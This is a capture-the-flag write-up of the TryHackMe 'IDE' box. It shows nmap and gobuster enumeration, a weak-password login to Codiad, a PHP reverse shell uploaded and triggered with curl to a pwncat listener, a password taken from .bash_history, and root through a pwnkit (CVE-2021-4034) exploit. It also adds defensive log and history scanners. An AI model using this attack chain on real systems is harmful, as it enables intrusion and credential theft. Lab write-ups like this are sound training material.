CTF : IDE

CTF IDE writeup. Source: THM. Announced difficulty level: Easy.

Posted by Boula-Bytes on 04 March 2022

Information

  • IP: 10.10.24.171
  • MYIP: 10.8.98.126

First enumeration

Basics

  • NMAP
```console
$ sudo nmap -p- -A 10.10.24.171
Starting Nmap 7.92 ( https://nmap.org ) at 2022-03-04 01:16 CET
Nmap scan report for 10.10.24.171
Host is up (0.038s latency).
Not shown: 65531 closed tcp ports (reset)
PORT      STATE SERVICE VERSION
21/tcp    open  ftp     vsftpd 3.0.3
| ftp-syst:
|   STAT:
| FTP server status:
|      Connected to ::ffff:10.8.98.126
|      Logged in as ftp
|      TYPE: ASCII
|      No session bandwidth limit
|      Session timeout in seconds is 300
|      Control connection is plain text
|      Data connections will be plain text
|      At session startup, client count was 2
|      vsFTPd 3.0.3 - secure, fast, stable
|_End of status
|_ftp-anon: Anonymous FTP login allowed (FTP code 230)
22/tcp    open  ssh     OpenSSH 7.6p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
|   2048 e2:be:d3:3c:e8:76:81:ef:47:7e:d0:43:d4:28:14:28 (RSA)
|   256 a8:82:e9:61:e4:bb:61:af:9f:3a:19:3b:64:bc:de:87 (ECDSA)
|_  256 24:46:75:a7:63:39:b6:3c:e9:f1:fc:a4:13:51:63:20 (ED25519)
80/tcp    open  http    Apache httpd 2.4.29 ((Ubuntu))
|_http-title: Apache2 Ubuntu Default Page: It works
|_http-server-header: Apache/2.4.29 (Ubuntu)
62337/tcp open  http    Apache httpd 2.4.29 ((Ubuntu))
|_http-title: Codiad 2.8.4
|_http-server-header: Apache/2.4.29 (Ubuntu)
Aggressive OS guesses: Linux 3.1 (95%), Linux 3.2 (95%), AXIS 210A or 211 Network Camera (Linux 2.6.17) (94%), ASUS RT-N56U WAP (Linux 3.4) (93%), Linux 3.16 (93%), Linux 2.6.32 (92%), Linux 2.6.39 - 3.2 (92%), Linux 3.1 - 3.2 (92%), Linux 3.2 - 4.9 (92%), Linux 3.7 - 3.10 (92%)
No exact OS matches for host (test conditions non-ideal).
Network Distance: 2 hops
Service Info: OSs: Unix, Linux; CPE: cpe:/o:linux:linux_kernel

TRACEROUTE (using port 554/tcp)
HOP RTT      ADDRESS
1   35.83 ms 10.8.0.1
2   35.96 ms 10.10.24.171

OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 79.71 seconds
```

FTP is accessible as anonymous.

```console
$ ftp 10.10.24.171
Connected to 10.10.24.171.
220 (vsFTPd 3.0.3)
Name (10.10.24.171:boula): anonymous
331 Please specify the password.
Password:
230 Login successful.
Remote system type is UNIX.
Using binary mode to transfer files.
ftp> ls -al
229 Entering Extended Passive Mode (|||62754|)
150 Here comes the directory listing.
drwxr-xr-x    3 0        114          4096 Jun 18  2021 .
drwxr-xr-x    3 0        114          4096 Jun 18  2021 ..
drwxr-xr-x    2 0        0            4096 Jun 18  2021 ...
226 Directory send OK.
ftp> pwd
Remote directory: /
ftp> cd ...
250 Directory successfully changed.
ftp> ls -al
229 Entering Extended Passive Mode (|||8327|)
150 Here comes the directory listing.
-rw-r--r--    1 0        0             151 Jun 18  2021 -
drwxr-xr-x    2 0        0            4096 Jun 18  2021 .
drwxr-xr-x    3 0        114          4096 Jun 18  2021 ..
226 Directory send OK.
ftp> get -
local: - remote: -
229 Entering Extended Passive Mode (|||9977|)
150 Opening BINARY mode data connection for - (151 bytes).
100% |**************************************************************************|   151        8.71 KiB/s    00:00 ETA
226 Transfer complete.
151 bytes received in 00:00 (2.78 KiB/s)
ftp> ^D
221 Goodbye.
```

There was one file named "-" in a directory named "...".

```console
$ mv "-" ftp_file
$ file ftp_file
ftp_file: ASCII text
$ cat ftp_file
Hey john,
I have reset the password as you have asked. Please use the default password to login.
Also, please take care of the image file ;)
- drac.
```

Now we are going to check HTTP on port 62337:

```console
$ gobuster dir -f -r -w /usr/share/wordlists/dirbuster/directory-list-2.3-big.txt -u http://10.10.24.171:62337 -x cgi,html,txt,js,php,php.bak,bak,zip,sql,sql.bak,tgz,tar.gz,bkp,tar,rar,id_rsa,log,xml,json,sh,py,pl,rb,csv,pub,jar 2>/dev/null
===============================================================
Gobuster v3.1.0
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url:                     http://10.10.24.171:62337
[+] Method:                  GET
[+] Threads:                 10
[+] Wordlist:                /usr/share/wordlists/dirbuster/directory-list-2.3-big.txt
[+] Negative Status codes:   404
[+] User Agent:              gobuster/3.1.0
[+] Extensions:              cgi,js,sql,bkp,rar,log,xml,pub,tgz,tar,html,php,php.bak,bak,zip,sql.bak,tar.gz,json,sh,pl,rb,txt,id_rsa,py,csv,jar
[+] Add Slash:               true
[+] Follow Redirect:         true
[+] Timeout:                 10s
===============================================================
2022/03/04 01:19:28 Starting gobuster in directory enumeration mode
===============================================================
/index.php            (Status: 200) [Size: 5239]
/icons/               (Status: 403) [Size: 280]
/themes/              (Status: 200) [Size: 1136]
/common.php           (Status: 200) [Size: 0]
/data/                (Status: 200) [Size: 1949]
/plugins/             (Status: 200) [Size: 942]
/lib/                 (Status: 200) [Size: 1178]
/languages/           (Status: 200) [Size: 4614]
/js/                  (Status: 200) [Size: 3702]
/components/          (Status: 200) [Size: 3943]
/config.php           (Status: 200) [Size: 0]
/INSTALL.txt          (Status: 200) [Size: 634]
/build.xml            (Status: 200) [Size: 456]
/LICENSE.txt          (Status: 200) [Size: 1133]
/workspace/           (Status: 200) [Size: 946]
```

The webapp installed is Codiad 2.8.4.

Vulnerabilities search

I tried to log in as user john. There is no default password in the documentation, so I tried "password" and got in.

Exploit

So basically I created a new project "MyProject" with nothing in the path field. The new project was created in http[:]//10.10.24.171[:]62337/workspace/. Then I added a new file shell.php containing a reverse shell.

After that, on Kali we just have to start a pwncat listener:

```console
$ pwncat -lp 1234
```

Now:

```console
curl http://10.10.24.171:62337/workspace/MyProject/shell.php
```

And we got a shell :)
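From the defender's side, the step above leaves a clear trace: Codiad stores projects under /workspace/, and nothing there should ever be executed by PHP. As an added example (not part of the original writeup), this Python check pulls every request for a PHP file under that prefix out of an Apache combined-format access log, reporting attempts (404) as well as executions (200). The log lines are constructed for the demo; the source IP is the MYIP from above.

```python
import re
from typing import Dict, List

# Apache 2.4 "combined" log format, as written by the Apache seen on the box.
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<path>\S+)(?: [^"]*)?" (?P<status>\d{3}) (?P<size>\S+)'
)

# Codiad writes every project under /workspace/. The suffixes mirror the
# FilesMatch pattern Ubuntu's mod_php config hands to the PHP handler.
WORKSPACE_PREFIX = "/workspace/"
PHP_SUFFIXES = (".php", ".phtml", ".phar")

def parse_line(line: str) -> Dict[str, str]:
    """Fields of one access-log line, or {} if the line does not parse."""
    m = LOG_RE.match(line)
    return m.groupdict() if m else {}

def workspace_php_requests(lines: List[str]) -> List[Dict[str, str]]:
    """Every request for a PHP file under the workspace, with its status.
    200 means the file ran; a 404 is a probe worth correlating too."""
    hits = []
    for line in lines:
        rec = parse_line(line)
        if not rec:
            continue
        path = rec["path"].split("?", 1)[0]      # drop any query string
        low = path.lower()
        if low.startswith(WORKSPACE_PREFIX) and low.endswith(PHP_SUFFIXES):
            hits.append({"ip": rec["ip"], "path": path, "ts": rec["ts"],
                         "method": rec["method"], "status": rec["status"]})
    return hits

# Constructed sample lines (not taken from the box). The last one mirrors the
# curl request above; the rest is ordinary IDE traffic and one failed probe.
SAMPLE_LOG = [
    '10.8.98.126 - - [04/Mar/2022:01:20:11 +0100] "GET /index.php HTTP/1.1" 200 5239 "-" "Mozilla/5.0"',
    '10.8.98.126 - - [04/Mar/2022:01:22:03 +0100] "GET /workspace/ HTTP/1.1" 200 946 "-" "Mozilla/5.0"',
    '10.8.98.126 - - [04/Mar/2022:01:23:40 +0100] "GET /workspace/MyProject/notes.txt HTTP/1.1" 200 12 "-" "Mozilla/5.0"',
    '10.8.98.126 - - [04/Mar/2022:01:24:02 +0100] "GET /workspace/Old/test.php HTTP/1.1" 404 280 "-" "curl/7.81.0"',
    '10.8.98.126 - - [04/Mar/2022:01:24:15 +0100] "GET /workspace/MyProject/shell.php HTTP/1.1" 200 0 "-" "curl/7.81.0"',
]

if __name__ == "__main__":
    for h in workspace_php_requests(SAMPLE_LOG):
        print(f"{h['ts']} {h['ip']} {h['method']} {h['path']} -> {h['status']}")
```

The fix that turns the 200 into a harmless download is to switch the PHP engine off for the workspace directory (with mod_php, `php_admin_flag engine off` inside a `<Directory>` block for it), so the check then only ever reports attempts.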

Privilege escalation

Enumeration for privesc

We are now connected as the www-data user. Let's see what we can find:

```console
$ cd drac
$ cat .bash_history
mysql -u drac -p 'Th3dRaCULa1sR3aL'
```

If we try this password to log in as user drac (via su or ssh), it works.
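The lateral move here cost nothing more than reading a history file, because the password had been typed on the command line. As an added example (not from the writeup), this Python scanner flags history lines that carry an inline credential, the way drac's mysql password was, while leaving the prompting form `mysql -u drac -p` alone. The tool patterns are my own short list, and the sample history is constructed apart from the line copied from above.

```python
import re
from typing import Dict, List

# Tail shared by the patterns: optional space and quote, then the secret. The
# negative lookahead stops a following option or redirection ("-p -h", "-p >")
# from being read as a password; "(?<=\s)" stops "-p" matching inside "--protocol".
SECRET = r"\s*['\"]?(?P<secret>(?![-<>|&])[^\s'\"]+)"
PATTERNS = [
    ("mysql",   re.compile(r"\bmysql(?:admin|dump)?\b.*?(?<=\s)(?:--password=|-p)" + SECRET)),
    ("sshpass", re.compile(r"\bsshpass\b.*?(?<=\s)-p" + SECRET)),
    ("curl",    re.compile(r"\bcurl\b.*?(?<=\s)(?:--user|-u)\s*['\"]?[^\s:'\"]+:(?P<secret>[^\s'\"]+)")),
    ("generic", re.compile(r"(?i)(?:password|passwd|token|api[_-]?key)=" + SECRET)),
]

def preview(secret: str) -> str:
    """Two characters are enough to match a finding to its line without re-exposing it."""
    return secret[:2] + "***"

def scan_history(lines: List[str]) -> List[Dict[str, object]]:
    """One finding per history line that carries an inline credential."""
    findings = []
    for lineno, line in enumerate(lines, 1):
        for tool, pat in PATTERNS:
            m = pat.search(line)
            if m:
                findings.append({"line": lineno, "tool": tool, "preview": preview(m.group("secret"))})
                break
    return findings

# Constructed sample history (not the file from the box); line 3 is the command
# the writeup found in drac's .bash_history.
SAMPLE_HISTORY = [
    "ls -la",
    "mysql -u drac -p",                                   # prompts: nothing leaked
    "mysql -u drac -p 'Th3dRaCULa1sR3aL'",                # password kept in history
    "mysqldump --protocol=tcp -u backup -p > dump.sql",   # "-p" in --protocol must not match
    "sshpass -p 'Spring2022!' ssh drac@ide",
    "curl -u john:password http://10.10.24.171:62337/",
    "export API_KEY=abc123example",
]

if __name__ == "__main__":
    for f in scan_history(SAMPLE_HISTORY):
        print(f"line {f['line']}: {f['tool']} credential {f['preview']}")
```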

```console
$ cat user.txt
```

Alright, let's start enumerating what this account can do:

```console
$ sudo -l
[sudo] password for drac:
Matching Defaults entries for drac on ide:
    env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin

User drac may run the following commands on ide:
    (ALL : ALL) /usr/sbin/service vsftpd restart
```

Which binaries have the setuid bit set?

```console
$ find / -perm -4000 2>/dev/null
/usr/lib/dbus-1.0/dbus-daemon-launch-helper
/usr/lib/openssh/ssh-keysign
/usr/lib/eject/dmcrypt-get-device
/usr/lib/x86_64-linux-gnu/lxc/lxc-user-nic
/usr/lib/snapd/snap-confine
/usr/lib/policykit-1/polkit-agent-helper-1
/usr/bin/passwd
/usr/bin/chfn
/usr/bin/newgrp
/usr/bin/at
/usr/bin/newgidmap
/usr/bin/pkexec
/usr/bin/sudo
/usr/bin/traceroute6.iputils
/usr/bin/newuidmap
/usr/bin/chsh
/usr/bin/gpasswd
/bin/umount
/bin/fusermount
/bin/ping
/bin/mount
/bin/su
```

Exploit

I tried pwnkit and it works (the Python file was sent over scp):

```console
$ python3 CVE-2021-4034.py
[+] Creating shared library for exploit code.
[+] Calling execve()
# cd /root/
# cat root.txt
```

\o/